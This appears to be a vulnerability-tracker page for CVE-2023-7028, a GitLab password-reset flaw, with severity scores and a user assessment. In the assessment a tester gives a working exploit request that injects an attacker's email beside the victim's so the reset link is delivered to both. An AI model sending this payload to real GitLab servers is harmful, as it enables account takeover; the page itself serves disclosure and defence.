CVE-2023-7028

2024-01-1200:00:00

attackerkb.com

gitlab

security issue

password reset

unverified email

vulnerable versions

patched versions

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

6.8 Medium

AI Score

Confidence

Low

0.96 High

EPSS

Percentile

99.5%

JSON

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

Recent assessments:

noraj at January 12, 2024 10:51am UTC reported:

Tested on Gitlab CE 16.6.1. Very effective and easy to exploit. In the following payload the brackets MUST be URL encoded, else it won’t work: user[email][][email protected]&user[email][][email protected].

POST /users/password HTTP/2
Host: gitlab.example.org
...

authenticity_token=&lt;auto_generated_token&gt;&user%5Bemail%5D%5B%5D=victim%40example.org&user%5Bemail%5D%5B%5D=attacker%40example.org

Note that you must know the email address and not the login name.

See here for vulnerable and patched versions.

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5